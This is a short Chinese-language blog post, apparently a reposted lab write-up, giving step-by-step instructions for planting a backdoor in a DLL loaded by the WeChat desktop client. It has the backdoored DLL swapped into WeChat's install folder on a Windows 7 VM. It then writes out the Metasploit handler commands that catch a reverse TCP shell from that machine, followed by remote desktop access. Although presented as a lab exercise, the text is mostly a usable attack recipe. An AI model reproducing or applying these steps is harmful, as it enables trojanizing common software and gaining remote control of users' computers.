利用微信进程中.dll文件添加后门

step1:打开Process EXplorer程序,找到微信程序的连接库文件libeay32.dll文件
step2:下载backdoor程序(如下图所示),拷贝到kail中,解压缩。
step3:在应用文件夹里运行脚本install.sh安装程序
step4:根据Process EXplorer程序中找到的dll文件,打开所在文件夹可以看到libEGL.dll文件,将其拷贝到backdoor软件的解压目录中
step5:终端中输入./backdoor.py -h 可以看到这软件的帮助页面
step6:为.dll文件添加后门后门(完整代码见下图),-P为端口,-H为监听主机的ip(即kail系统的ip地址);
 step7:运行成功后本文件夹中会出现一个backdoored文件夹,里面就是添加过后门的dll文件;
step8:把libEGL.dll文件拷贝到win7虚拟机里,替换掉微信安装文件夹里的那个文件
step9:在kail中新开一个终端,开启postgresql数据库命令为:/etc/init.d/postgresql start,运行msconsole程序;
使用监听工具,命令分别是:
use exploit/multi/handler 
set payload windows/shell_reverse_tcp
输入show options命令可以看到配置,下图所示还没配置端口和ip地址:
step10:set lhost kail的ip地址  --设置监听主机
set lport 端口 --设置监听端口
输入show options查看设置
step11:输入exploit命令启动监测,win7端重新打开微信,可以看到后门可以使用
step12:使用rdesktop可以连接win的远程桌面,实验完成

猜你喜欢

转载自www.cnblogs.com/yyhfirstblog/p/11644918.html